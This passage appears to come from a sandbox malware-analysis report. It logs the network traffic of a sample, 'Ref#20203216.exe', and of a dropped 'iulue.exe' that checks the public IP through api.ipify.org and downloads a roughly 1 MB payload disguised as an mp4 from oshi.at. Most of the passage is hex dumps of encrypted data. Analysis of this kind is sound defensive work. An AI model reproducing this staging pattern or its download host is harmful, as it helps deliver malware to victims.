                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: 50 93 83 e4 be 97 c6 52 50 9c 62 f9 ff eb c2 88 be da 41 bf 14 71 eb cb 50 e0 f1 58 ff 31 3d 10 d4 27 b1 99 c1 25 cf 09 ae 82 87 a4 96 aa ae ab 39 0d 10 2e 21 67 07 3c 54 e4 35 13 39 6a 23 cd e6 8e c5 12 64 06 25 ed c5 fa 43 8b 34 d7 9c 0b 63 a0 26 91 37 f7 83 25 85 fc 8c 14 4f 56 8d 69 bd c1 3b 7c b1 48 0c 8b a7 8e f9 11 8c dc a5 7f bf 52 ca 27 bc 82 e5 39 b6 92 ef 25 2b a4 67 f7 17 3a b5 3e 84 1f 4f fe 77 8d 8c 8b c8 16 02 7e 0a 8e 18 36 08 22 b5 71 a3 47 78 68 5b 31 aa 3d 30 3c ef 07 c4 d4 77 81 40 88 f7 25 4a b5 b9 cf 7c 3b 73 f8 e7 4f e2 19 c8 66 d5 9b b3 66 56 cd c2 b7 38 f5 bd 45 d6 d6 79 e5 03 b2 4f 1f e9 99 a0 dc 58 ca 2a 89 25 86 48 9c a6 7f ab ec 5d de c0 17 10 06 e9 5c 51 47 ee c1 d9 90 d0 33 ba 1f 41 c9 be e7 68 43 e4 b7 ec 7c c7 8c c3 ed ee
                                                                                                Data Ascii: PRPbAqPX1='%9.!g<T59j#d%C4c&7%OVi;|HR'9%+g:>Ow~6"qGxh[1=0<w@%J|;sOffV8EyOX*%H]\QG3AhC|
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: 14 9e 07 15 14 c2 3e df 25 28 10 e1 37 c2 74 c9 94 c8 6c 7a 29 b4 77 5a 13 4c be 36 c0 03 98 b5 0c 00 ca 7e 6a ea c8 34 cb 00 fa cf ed 37 f7 a8 67 5e da 8a d6 fb 94 c8 1b 66 40 cf 95 31 ab 0f 0c c9 24 57 2f b2 3c 6f 69 19 cc 58 64 40 4e 7d 52 13 bd 67 d0 96 b8 7d 43 0b 9a 04 b4 c7 b9 db e7 3d 09 9a 5e af b4 97 ac c0 8b ea 51 7a 67 01 29 f8 db 9a 88 06 e9 6a ee c3 35 c5 1d ca 99 97 73 82 2d 20 84 90 20 af 22 26 88 b8 ad b9 22 2a 76 7d 2d 48 7d d7 5f 6e cb f1 2b 8b 6d 63 66 a8 d7 ea e2 ff d6 44 f1 b7 4a ed 9c c9 bd 62 0a e4 e6 5d bb 7c c3 42 49 03 96 25 db 8b 9d 65 31 46 a6 b3 4c 13 c5 6d e2 4b ff 07 90 7c 15 a6 f1 c2 ce d5 7a a2 20 87 d9 61 79 a3 d0 a4 31 6b 8f c3 5b 5f ac 59 2d a3 af 75 28 16 43 ee 43 28 6e 24 ea 4d 9c 80 a1 ec d3 19 2b 35 56 2c 6c f3 e0
                                                                                                Data Ascii: >%(7tlz)wZL6~j47g^f@1$W/<oiXd@N}Rg}C=^Qzg)j5s- "&"*v}-H}_n+mcfDJb]|BI%e1FLmK|z ay1k[_Y-u(CC(n$M+5V,l
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: cc 8e 52 5f c4 a8 2f 6b 54 6c 9b f7 87 5d 07 eb 2e 05 c3 bf 4a 5b 24 13 c3 fc c8 12 25 18 6c 9f 8d 32 2c 25 48 d8 01 56 16 5c 06 35 1f c3 db 9d 35 33 a5 93 fe b0 4b 43 39 41 17 5c 24 ae 6d d2 c5 5f c3 22 50 66 e0 49 00 41 b5 7a a5 82 8f 3f b6 a9 46 54 ff 8d 0e ff 61 05 81 02 b6 e9 7b ae bd 29 b8 53 f1 48 3a be 07 aa 90 ce da e4 4a e1 c6 9a ad b7 36 2b c0 bd 94 a4 b4 21 65 8b f9 8e 4d ed b6 bc 33 9e 76 26 86 fc 31 be 43 b8 69 22 6a 46 5d 8f 4d e2 6c 1f f6 e0 1c cb 6f 1c a0 46 88 fe ab 63 59 72 20 ea a0 27 cb d4 e3 b2 d0 9b 47 19 17 17 ce 43 04 17 1b aa 33 53 eb 3b 7b 0d 7f b4 40 b0 96 f8 d9 72 55 94 e1 e6 bb 5f b7 db dd 1c b2 89 29 1b ab c9 e8 56 ed 27 15 57 15 4c fd 1e 60 41 dc 30 7a e8 d2 a7 8d ce f7 46 33 a5 ba 41 18 d4 6f 87 4b b5 20 2a 9e 2d 6b f4 3e
                                                                                                Data Ascii: R_/kTl].J[$%l2,%HV\553KC9A\$m_"PfIAz?FTa{)SH:J6+!eM3v&1Ci"jF]MloFcYr 'GC3S;{@rU_)V'WL`A0zF3AoK *-k>
                                                                                                2024-12-23 08:08:49 UTC2234INData Raw: 34 e3 d4 a6 48 a9 6b 9c 7b e8 10 b5 70 5c 35 6e d0 cd da 02 a9 1e ba 29 c9 46 71 36 c3 89 10 40 48 eb 67 0d 03 2d 77 36 88 3d 09 de ae 88 68 2f c4 fd a7 a2 ab 40 d1 49 f3 b3 85 79 31 45 62 2f 2a 32 95 6d 95 b5 56 11 09 25 e4 85 97 d6 4d 11 11 c3 16 74 dd c9 54 f6 d6 89 15 dd d2 7d 12 29 f0 26 4d 53 3c 04 89 13 80 04 d0 95 9f b9 67 8d a0 b2 b2 e2 62 e1 ea c9 34 b7 2d 73 03 84 15 13 2c c8 8c 64 d5 d2 50 fb 2d ea 8a 3a a3 12 90 cf 84 eb dc 4f dd b6 eb 3a 2b 78 3b 4c 2c af 7a 60 a2 12 19 ce 56 92 4a 5f 98 ad 6d 13 26 fd 6b 3c 1b 12 70 01 17 ba b9 13 3c ba 7c f7 06 a2 5d 76 e4 8c 9b c6 40 39 e9 df 9c e5 9e fe ab 29 0f 5c d6 66 bd 63 1b 13 e0 2d e8 8c 71 1c 03 c6 6b 25 16 74 a8 2d 0d b5 a6 38 b9 7c 16 4d 3f 7b 7d 4b 3c df 05 6c 30 06 ab ca a5 a4 57 5b 9f 03 a6
                                                                                                Data Ascii: 4Hk{p\5n)Fq6@Hg-w6=h/@Iy1Eb/*2mV%MtT})&MS<gb4-s,dP-:O:+x;L,z`VJ_m&k<p<|]v@9)\fc-qk%t-8|M?{}K<l0W[
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: c3 f8 88 69 c2 94 5f 42 10 05 34 23 6a bb 7a ee 4f 2c ff 7c 72 92 ea a6 6b 2c 2d 99 cb fb ba 6b 82 21 ab 86 cc db e9 51 e9 e2 79 3a 4d 70 23 e0 4c e1 8d c7 e5 93 32 06 e2 13 b2 e8 d1 74 4e 04 d9 d1 fa 97 3a 77 b2 2f 15 e6 bb f1 97 24 99 1f 66 ae 4b 8e ab 0f 74 ef e7 1e 3d db 63 1a 65 74 14 86 62 93 c3 11 c9 91 a3 2b 6f 7e bc 1b 16 ed 46 dc 0e ec 08 1f 1d 25 af b2 1c 17 6e e6 53 8c 3a 0b 35 75 79 4a e4 13 17 e9 a4 06 07 05 85 62 d8 54 99 c5 a6 40 b0 85 cc be 0a 16 92 e5 a1 d8 ac cd e0 b6 85 5d c4 ba 5a 6c 8f 66 b9 2a b3 9f 2b 46 6b a8 a9 51 f7 0e a1 ad b3 a1 5e 1e c1 82 82 f5 cc 18 a2 92 a3 ee 18 52 31 b3 5d bd 8a cd 9c a8 bd 9f 8c 02 3e 3c 7b a5 05 79 67 9e 48 74 bb c2 e3 92 aa a2 d4 40 d1 f5 71 65 7a 7d 19 33 53 d6 77 c4 af f2 53 72 48 21 a5 80 09 5a b8
                                                                                                Data Ascii: i_B4#jzO,|rk,-k!Qy:Mp#L2tN:w/$fKt=cetb+o~F%nS:5uyJbT@]Zlf*+FkQ^R1]><{ygHt@qez}3SwSrH!Z
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: a4 f1 7c b8 bb 24 9d eb 67 5f f8 c3 12 e5 bd c4 fa b8 f7 4c be 00 4a be ed f0 be cc bd 86 40 1c 19 a1 c0 b1 95 81 ef 8b 49 74 ad 1c 06 b1 15 01 a4 c1 e7 49 95 b0 8e ba 5e b6 3d 3c 5f 47 d0 f7 13 90 d0 24 68 b7 40 6f 51 96 1c 96 64 93 89 d1 36 e2 a8 fe 7a 5a 04 d7 0e 99 6e f7 46 0d 21 ed fd 6e 80 50 52 0b 01 82 a0 b8 9e 68 2e 7b 01 97 86 1c 10 f7 ec 21 1a 04 02 2b 39 7c 41 04 77 16 f5 3e 20 cf 8c e0 d1 3d 90 75 3f 47 c9 9f 94 bb 38 97 a8 94 12 de 5f cb 4a be cb 70 45 a6 58 82 1b 99 80 b6 0e d0 20 1f 1e 0c 0d 9e a2 6e 03 ef 47 f9 c6 14 f5 c3 b2 5f 5e 8e 48 f4 66 32 29 d6 4d 70 97 a3 0f a9 55 a6 a5 a6 50 bb 00 6f ab 4e 06 94 38 ac 33 5e e9 3a 6e dd 28 d1 75 de 46 a7 23 6e 0c f2 64 85 65 a6 0c b0 ef a2 b0 04 cb bd 92 63 1e 08 d0 36 5c 44 ec fe 9d 02 a3 34 a4
                                                                                                Data Ascii: |$g_LJ@ItI^=<_G$h@oQd6zZnF!nPRh.{!+9|Aw> =u?G8_JpEX nG_^Hf2)MpUPoN83^:n(uF#ndec6\D4
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: 60 55 57 e3 2d 98 90 99 36 01 3d 1b 84 31 a6 fb 75 df 87 69 3b ca a3 1c 97 43 61 a9 7e 5a 42 37 64 7f e9 9a 4c 20 a5 66 8b 8d fd f5 2d 85 41 44 56 3d 52 a7 fa 6b ce 82 46 a7 4f c0 80 f0 9d ca d4 48 80 05 be 79 ac 5d 6d 12 2b 95 55 63 3e 81 f6 45 c6 f2 c0 4e d1 23 f4 de 9f 8b 7a c0 cf 8d b3 57 cf b3 bf b7 d9 92 80 4e 02 20 bc 3b dd c5 26 96 a5 22 fe 11 d3 b2 7b b1 9d 82 4c 3d 35 6d d8 98 74 70 4e 68 10 b6 59 79 b0 e6 a2 d3 62 14 1f 74 ce b9 bb 9b 05 d2 bd e9 66 da 3e e9 a0 90 1f d9 5b 84 21 3f 4b 77 f1 ef 07 de bb d8 e0 d5 66 8b 89 3b f0 0a b2 52 7f d4 f2 16 5f 5e 5a d5 c9 09 95 e8 0f 22 d4 21 52 bc 17 5a 81 c8 58 04 a9 3e 63 44 3d 22 c6 cd ed 64 2d c8 b7 95 fa 4c d3 10 ff 21 7f e3 28 fc 03 25 34 82 a0 a9 2b f8 9d d5 45 99 f4 3b aa d3 89 5a 9a 0e 29 c6 12
                                                                                                Data Ascii: `UW-6=1ui;Ca~ZB7dL f-ADV=RkFOHy]m+Uc>EN#zWN ;&"{L=5mtpNhYybtf>[!?Kwf;R_^Z"!RZX>cD="d-L!(%4+E;Z)
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: 51 28 20 53 33 87 db e0 67 82 4b ec 81 96 e8 b9 15 58 27 bd c8 01 f0 ca 85 0b 10 7a c3 59 52 0c e4 5a 45 77 8f eb 61 cd 11 92 db be 60 8f b2 69 2d 6f 6c 78 db 16 22 a9 0c c9 bc d9 3b f2 7c 92 93 67 48 03 e0 a9 ed 1e f8 06 80 2a 33 b2 c5 26 82 1a a9 01 33 2c 45 1e af c1 c9 b7 8c e0 8e 55 b7 9f df 02 79 3f f9 46 a8 c7 e3 c3 25 1d a7 98 31 af 26 33 87 fb 2c a6 78 cd df ed c0 cf 0a 75 c7 52 63 c7 0e 09 40 3f 9d 76 01 8d 28 32 a8 06 ff 8a 27 1b a3 34 c5 c5 ad f7 a4 fb 48 d9 07 da be 82 0b fb 89 df 43 a3 b1 46 09 06 66 a3 5f f3 2d 84 82 27 c1 be 86 51 75 b8 3b 68 a7 37 9a 8f 00 6f 6a 3a fc 3b d5 8a 96 d9 63 73 49 68 3f 7e 96 4b 61 7c 47 1c 82 f6 e3 1c 57 fc 18 47 ef e8 4e 74 9e cd 33 93 37 3f 56 50 06 63 8e 09 02 10 8f 4d f2 01 06 7d e3 42 66 45 01 40 24 60 d8
                                                                                                Data Ascii: Q( S3gKX'zYRZEwa`i-olx";|gH*3&3,EUy?F%1&3,xuRc@?v(2'4HCFf_-'Qu;h7oj:;csIh?~Ka|GWGNt37?VPcM}BfE@$`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449734104.26.13.2054432120C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-23 08:08:54 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                Host: api.ipify.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-23 08:08:54 UTC424INHTTP/1.1 200 OK
                                                                                                Date: Mon, 23 Dec 2024 08:08:54 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 12
                                                                                                Connection: close
                                                                                                Vary: Origin
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f66ddcdbec74289-EWR
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1599&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1802469&cwnd=150&unsent_bytes=0&cid=949005fd35cac83d&ts=456&x=0"
                                                                                                2024-12-23 08:08:54 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                Data Ascii: 8.46.123.189


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.4497385.253.86.154433264C:\Users\user\AppData\Roaming\iulue.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-23 08:09:05 UTC61OUTGET /nvgU HTTP/1.1
                                                                                                Host: oshi.at
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-23 08:09:06 UTC301INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 23 Dec 2024 08:09:06 GMT
                                                                                                Content-Type: video/mp4
                                                                                                Content-Length: 997896
                                                                                                Connection: close
                                                                                                ETag: "51652c24f2733a9a3e405e7f7691ae0b"
                                                                                                Content-Disposition: attachment; filename=eFcR.mp4
                                                                                                Accept-Ranges: bytes
                                                                                                Last-Modified: Mon, 23 Dec 2024 00:20:33 GMT
                                                                                                2024-12-23 08:09:06 UTC3782INData Raw: 0e 79 27 93 9d c1 6f 5d d6 e0 ee c2 96 7d 54 75 af e3 db f0 78 c0 5b aa 3d 91 dc d0 9a 47 93 a3 4a 82 bd 96 78 8d 69 20 54 82 b4 ef db e5 86 92 6d 65 a8 05 bc e4 43 aa d3 f9 77 2a ee ac 49 05 df 85 7d 85 22 9c ad 4c 96 b2 d5 15 be cf 0f 7b 05 9b 21 3a b3 04 ac 47 e3 a2 53 8e 75 57 a7 91 97 48 91 26 4c b3 4a 3e 32 17 76 46 be a6 04 49 68 22 4d a4 6f 97 a5 56 9a da 3f c9 e6 d2 c6 51 69 40 96 92 a8 c5 b1 cb 51 d2 d0 0f 5c 67 67 d5 ce 11 94 f4 e1 a1 ed bd e1 03 1b 92 ee 4f 1f 4e 81 f7 2a c7 86 35 a1 ef d9 98 9e bc 8c 0c 9c f2 c5 71 5c ac 3a e0 83 ab 66 c0 8a 18 67 a2 58 22 2c 7f e9 a2 38 a1 e9 9b 5c 8b cd 1b 91 05 0b ff a2 b6 ff 65 af 80 9a d9 b9 e5 dd 54 8e a8 de 35 1f cc 9c 0a bd 15 5a be 61 b9 8d c8 49 93 08 3b c0 e4 f3 94 1d fc e6 e6 57 e4 f0 70 1d 65 05
                                                                                                Data Ascii: y'o]}Tux[=GJxi TmeCw*I}"L{!:GSuWH&LJ>2vFIh"MoV?Qi@Q\ggON*5q\:fgX",8\eT5ZaI;Wpe
                                                                                                2024-12-23 08:09:06 UTC4096INData Raw: b2 42 55 f4 fd 90 bc 04 43 5c 01 70 3f fb 12 d2 9e fb c8 6e 44 5a f7 73 b5 d2 b1 52 d4 94 63 62 e1 78 16 98 09 3d 17 31 a9 79 39 05 99 69 4f 4c 51 80 d8 fd 56 1f fe 25 b7 e2 1f 98 c3 a8 05 e7 2c 72 37 68 00 21 f7 b0 71 cd 46 0b e1 7c 1b 59 6d 1d fd 77 eb a0 0d 85 bc 9e 91 6e ee 45 8b 97 da b1 bd 62 ee e9 46 58 31 4d 85 35 8c 72 0d 45 d0 91 b2 5b 96 36 be 5f 6f b9 a4 fd 34 fb fa 61 1f d9 0b ab fb 43 6e ff af d9 34 98 fe 5c c6 28 01 61 b6 f2 e8 f5 2c c8 7f d2 11 dd d8 84 04 55 27 b1 5a 7d 53 b2 86 83 d4 4b f6 a7 b2 ee 60 b4 ee 54 d3 68 7c a0 d6 cd 80 9f 98 90 9c 74 64 44 24 fb 6a 29 78 5a 41 e5 c5 47 a5 1f 32 49 ed 9b 87 2e 47 b3 a9 fa 6e 96 f2 01 4e c1 3c 8a 6f 74 ca 36 82 14 07 c5 bc d3 72 2b 89 69 f3 80 3c 9b 20 0a 24 12 f0 89 66 42 38 27 f5 62 47 cc 4a
                                                                                                Data Ascii: BUC\p?nDZsRcbx=1y9iOLQV%,r7h!qF|YmwnEbFX1M5rE[6_o4aCn4\(a,U'Z}SK`Th|tdD$j)xZAG2I.GnN<ot6r+i< $fB8'bGJ
                                                                                                2024-12-23 08:09:06 UTC4096INData Raw: 50 93 83 e4 be 97 c6 52 50 9c 62 f9 ff eb c2 88 be da 41 bf 14 71 eb cb 50 e0 f1 58 ff 31 3d 10 d4 27 b1 99 c1 25 cf 09 ae 82 87 a4 96 aa ae ab 39 0d 10 2e 21 67 07 3c 54 e4 35 13 39 6a 23 cd e6 8e c5 12 64 06 25 ed c5 fa 43 8b 34 d7 9c 0b 63 a0 26 91 37 f7 83 25 85 fc 8c 14 4f 56 8d 69 bd c1 3b 7c b1 48 0c 8b a7 8e f9 11 8c dc a5 7f bf 52 ca 27 bc 82 e5 39 b6 92 ef 25 2b a4 67 f7 17 3a b5 3e 84 1f 4f fe 77 8d 8c 8b c8 16 02 7e 0a 8e 18 36 08 22 b5 71 a3 47 78 68 5b 31 aa 3d 30 3c ef 07 c4 d4 77 81 40 88 f7 25 4a b5 b9 cf 7c 3b 73 f8 e7 4f e2 19 c8 66 d5 9b b3 66 56 cd c2 b7 38 f5 bd 45 d6 d6 79 e5 03 b2 4f 1f e9 99 a0 dc 58 ca 2a 89 25 86 48 9c a6 7f ab ec 5d de c0 17 10 06 e9 5c 51 47 ee c1 d9 90 d0 33 ba 1f 41 c9 be e7 68 43 e4 b7 ec 7c c7 8c c3 ed ee
                                                                                                Data Ascii: PRPbAqPX1='%9.!g<T59j#d%C4c&7%OVi;|HR'9%+g:>Ow~6"qGxh[1=0<w@%J|;sOffV8EyOX*%H]\QG3AhC|
                                                                                                2024-12-23 08:09:06 UTC4096INData Raw: 14 9e 07 15 14 c2 3e df 25 28 10 e1 37 c2 74 c9 94 c8 6c 7a 29 b4 77 5a 13 4c be 36 c0 03 98 b5 0c 00 ca 7e 6a ea c8 34 cb 00 fa cf ed 37 f7 a8 67 5e da 8a d6 fb 94 c8 1b 66 40 cf 95 31 ab 0f 0c c9 24 57 2f b2 3c 6f 69 19 cc 58 64 40 4e 7d 52 13 bd 67 d0 96 b8 7d 43 0b 9a 04 b4 c7 b9 db e7 3d 09 9a 5e af b4 97 ac c0 8b ea 51 7a 67 01 29 f8 db 9a 88 06 e9 6a ee c3 35 c5 1d ca 99 97 73 82 2d 20 84 90 20 af 22 26 88 b8 ad b9 22 2a 76 7d 2d 48 7d d7 5f 6e cb f1 2b 8b 6d 63 66 a8 d7 ea e2 ff d6 44 f1 b7 4a ed 9c c9 bd 62 0a e4 e6 5d bb 7c c3 42 49 03 96 25 db 8b 9d 65 31 46 a6 b3 4c 13 c5 6d e2 4b ff 07 90 7c 15 a6 f1 c2 ce d5 7a a2 20 87 d9 61 79 a3 d0 a4 31 6b 8f c3 5b 5f ac 59 2d a3 af 75 28 16 43 ee 43 28 6e 24 ea 4d 9c 80 a1 ec d3 19 2b 35 56 2c 6c f3 e0
                                                                                                Data Ascii: >%(7tlz)wZL6~j47g^f@1$W/<oiXd@N}Rg}C=^Qzg)j5s- "&"*v}-H}_n+mcfDJb]|BI%e1FLmK|z ay1k[_Y-u(CC(n$M+5V,l
                                                                                                2024-12-23 08:09:06 UTC4096INData Raw: cc 8e 52 5f c4 a8 2f 6b 54 6c 9b f7 87 5d 07 eb 2e 05 c3 bf 4a 5b 24 13 c3 fc c8 12 25 18 6c 9f 8d 32 2c 25 48 d8 01 56 16 5c 06 35 1f c3 db 9d 35 33 a5 93 fe b0 4b 43 39 41 17 5c 24 ae 6d d2 c5 5f c3 22 50 66 e0 49 00 41 b5 7a a5 82 8f 3f b6 a9 46 54 ff 8d 0e ff 61 05 81 02 b6 e9 7b ae bd 29 b8 53 f1 48 3a be 07 aa 90 ce da e4 4a e1 c6 9a ad b7 36 2b c0 bd 94 a4 b4 21 65 8b f9 8e 4d ed b6 bc 33 9e 76 26 86 fc 31 be 43 b8 69 22 6a 46 5d 8f 4d e2 6c 1f f6 e0 1c cb 6f 1c a0 46 88 fe ab 63 59 72 20 ea a0 27 cb d4 e3 b2 d0 9b 47 19 17 17 ce 43 04 17 1b aa 33 53 eb 3b 7b 0d 7f b4 40 b0 96 f8 d9 72 55 94 e1 e6 bb 5f b7 db dd 1c b2 89 29 1b ab c9 e8 56 ed 27 15 57 15 4c fd 1e 60 41 dc 30 7a e8 d2 a7 8d ce f7 46 33 a5 ba 41 18 d4 6f 87 4b b5 20 2a 9e 2d 6b f4 3e
                                                                                                Data Ascii: R_/kTl].J[$%l2,%HV\553KC9A\$m_"PfIAz?FTa{)SH:J6+!eM3v&1Ci"jF]MloFcYr 'GC3S;{@rU_)V'WL`A0zF3AoK *-k>
                                                                                                2024-12-23 08:09:06 UTC2234INData Raw: 34 e3 d4 a6 48 a9 6b 9c 7b e8 10 b5 70 5c 35 6e d0 cd da 02 a9 1e ba 29 c9 46 71 36 c3 89 10 40 48 eb 67 0d 03 2d 77 36 88 3d 09 de ae 88 68 2f c4 fd a7 a2 ab 40 d1 49 f3 b3 85 79 31 45 62 2f 2a 32 95 6d 95 b5 56 11 09 25 e4 85 97 d6 4d 11 11 c3 16 74 dd c9 54 f6 d6 89 15 dd d2 7d 12 29 f0 26 4d 53 3c 04 89 13 80 04 d0 95 9f b9 67 8d a0 b2 b2 e2 62 e1 ea c9 34 b7 2d 73 03 84 15 13 2c c8 8c 64 d5 d2 50 fb 2d ea 8a 3a a3 12 90 cf 84 eb dc 4f dd b6 eb 3a 2b 78 3b 4c 2c af 7a 60 a2 12 19 ce 56 92 4a 5f 98 ad 6d 13 26 fd 6b 3c 1b 12 70 01 17 ba b9 13 3c ba 7c f7 06 a2 5d 76 e4 8c 9b c6 40 39 e9 df 9c e5 9e fe ab 29 0f 5c d6 66 bd 63 1b 13 e0 2d e8 8c 71 1c 03 c6 6b 25 16 74 a8 2d 0d b5 a6 38 b9 7c 16 4d 3f 7b 7d 4b 3c df 05 6c 30 06 ab ca a5 a4 57 5b 9f 03 a6
                                                                                                Data Ascii: 4Hk{p\5n)Fq6@Hg-w6=h/@Iy1Eb/*2mV%MtT})&MS<gb4-s,dP-:O:+x;L,z`VJ_m&k<p<|]v@9)\fc-qk%t-8|M?{}K<l0W[
                                                                                                2024-12-23 08:09:07 UTC4096INData Raw: c3 f8 88 69 c2 94 5f 42 10 05 34 23 6a bb 7a ee 4f 2c ff 7c 72 92 ea a6 6b 2c 2d 99 cb fb ba 6b 82 21 ab 86 cc db e9 51 e9 e2 79 3a 4d 70 23 e0 4c e1 8d c7 e5 93 32 06 e2 13 b2 e8 d1 74 4e 04 d9 d1 fa 97 3a 77 b2 2f 15 e6 bb f1 97 24 99 1f 66 ae 4b 8e ab 0f 74 ef e7 1e 3d db 63 1a 65 74 14 86 62 93 c3 11 c9 91 a3 2b 6f 7e bc 1b 16 ed 46 dc 0e ec 08 1f 1d 25 af b2 1c 17 6e e6 53 8c 3a 0b 35 75 79 4a e4 13 17 e9 a4 06 07 05 85 62 d8 54 99 c5 a6 40 b0 85 cc be 0a 16 92 e5 a1 d8 ac cd e0 b6 85 5d c4 ba 5a 6c 8f 66 b9 2a b3 9f 2b 46 6b a8 a9 51 f7 0e a1 ad b3 a1 5e 1e c1 82 82 f5 cc 18 a2 92 a3 ee 18 52 31 b3 5d bd 8a cd 9c a8 bd 9f 8c 02 3e 3c 7b a5 05 79 67 9e 48 74 bb c2 e3 92 aa a2 d4 40 d1 f5 71 65 7a 7d 19 33 53 d6 77 c4 af f2 53 72 48 21 a5 80 09 5a b8
                                                                                                Data Ascii: i_B4#jzO,|rk,-k!Qy:Mp#L2tN:w/$fKt=cetb+o~F%nS:5uyJbT@]Zlf*+FkQ^R1]><{ygHt@qez}3SwSrH!Z
                                                                                                2024-12-23 08:09:07 UTC4096INData Raw: a4 f1 7c b8 bb 24 9d eb 67 5f f8 c3 12 e5 bd c4 fa b8 f7 4c be 00 4a be ed f0 be cc bd 86 40 1c 19 a1 c0 b1 95 81 ef 8b 49 74 ad 1c 06 b1 15 01 a4 c1 e7 49 95 b0 8e ba 5e b6 3d 3c 5f 47 d0 f7 13 90 d0 24 68 b7 40 6f 51 96 1c 96 64 93 89 d1 36 e2 a8 fe 7a 5a 04 d7 0e 99 6e f7 46 0d 21 ed fd 6e 80 50 52 0b 01 82 a0 b8 9e 68 2e 7b 01 97 86 1c 10 f7 ec 21 1a 04 02 2b 39 7c 41 04 77 16 f5 3e 20 cf 8c e0 d1 3d 90 75 3f 47 c9 9f 94 bb 38 97 a8 94 12 de 5f cb 4a be cb 70 45 a6 58 82 1b 99 80 b6 0e d0 20 1f 1e 0c 0d 9e a2 6e 03 ef 47 f9 c6 14 f5 c3 b2 5f 5e 8e 48 f4 66 32 29 d6 4d 70 97 a3 0f a9 55 a6 a5 a6 50 bb 00 6f ab 4e 06 94 38 ac 33 5e e9 3a 6e dd 28 d1 75 de 46 a7 23 6e 0c f2 64 85 65 a6 0c b0 ef a2 b0 04 cb bd 92 63 1e 08 d0 36 5c 44 ec fe 9d 02 a3 34 a4
                                                                                                Data Ascii: |$g_LJ@ItI^=<_G$h@oQd6zZnF!nPRh.{!+9|Aw> =u?G8_JpEX nG_^Hf2)MpUPoN83^:n(uF#ndec6\D4
                                                                                                2024-12-23 08:09:07 UTC4096INData Raw: 60 55 57 e3 2d 98 90 99 36 01 3d 1b 84 31 a6 fb 75 df 87 69 3b ca a3 1c 97 43 61 a9 7e 5a 42 37 64 7f e9 9a 4c 20 a5 66 8b 8d fd f5 2d 85 41 44 56 3d 52 a7 fa 6b ce 82 46 a7 4f c0 80 f0 9d ca d4 48 80 05 be 79 ac 5d 6d 12 2b 95 55 63 3e 81 f6 45 c6 f2 c0 4e d1 23 f4 de 9f 8b 7a c0 cf 8d b3 57 cf b3 bf b7 d9 92 80 4e 02 20 bc 3b dd c5 26 96 a5 22 fe 11 d3 b2 7b b1 9d 82 4c 3d 35 6d d8 98 74 70 4e 68 10 b6 59 79 b0 e6 a2 d3 62 14 1f 74 ce b9 bb 9b 05 d2 bd e9 66 da 3e e9 a0 90 1f d9 5b 84 21 3f 4b 77 f1 ef 07 de bb d8 e0 d5 66 8b 89 3b f0 0a b2 52 7f d4 f2 16 5f 5e 5a d5 c9 09 95 e8 0f 22 d4 21 52 bc 17 5a 81 c8 58 04 a9 3e 63 44 3d 22 c6 cd ed 64 2d c8 b7 95 fa 4c d3 10 ff 21 7f e3 28 fc 03 25 34 82 a0 a9 2b f8 9d d5 45 99 f4 3b aa d3 89 5a 9a 0e 29 c6 12
                                                                                                Data Ascii: `UW-6=1ui;Ca~ZB7dL f-ADV=RkFOHy]m+Uc>EN#zWN ;&"{L=5mtpNhYybtf>[!?Kwf;R_^Z"!RZX>cD="d-L!(%4+E;Z)
                                                                                                2024-12-23 08:09:07 UTC4096INData Raw: 51 28 20 53 33 87 db e0 67 82 4b ec 81 96 e8 b9 15 58 27 bd c8 01 f0 ca 85 0b 10 7a c3 59 52 0c e4 5a 45 77 8f eb 61 cd 11 92 db be 60 8f b2 69 2d 6f 6c 78 db 16 22 a9 0c c9 bc d9 3b f2 7c 92 93 67 48 03 e0 a9 ed 1e f8 06 80 2a 33 b2 c5 26 82 1a a9 01 33 2c 45 1e af c1 c9 b7 8c e0 8e 55 b7 9f df 02 79 3f f9 46 a8 c7 e3 c3 25 1d a7 98 31 af 26 33 87 fb 2c a6 78 cd df ed c0 cf 0a 75 c7 52 63 c7 0e 09 40 3f 9d 76 01 8d 28 32 a8 06 ff 8a 27 1b a3 34 c5 c5 ad f7 a4 fb 48 d9 07 da be 82 0b fb 89 df 43 a3 b1 46 09 06 66 a3 5f f3 2d 84 82 27 c1 be 86 51 75 b8 3b 68 a7 37 9a 8f 00 6f 6a 3a fc 3b d5 8a 96 d9 63 73 49 68 3f 7e 96 4b 61 7c 47 1c 82 f6 e3 1c 57 fc 18 47 ef e8 4e 74 9e cd 33 93 37 3f 56 50 06 63 8e 09 02 10 8f 4d f2 01 06 7d e3 42 66 45 01 40 24 60 d8
                                                                                                Data Ascii: Q( S3gKX'zYRZEwa`i-olx";|gH*3&3,EUy?F%1&3,xuRc@?v(2'4HCFf_-'Qu;h7oj:;csIh?~Ka|GWGNt37?VPcM}BfE@$`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449742104.26.13.2054437116C:\Users\user\AppData\Roaming\iulue.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-23 08:09:11 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
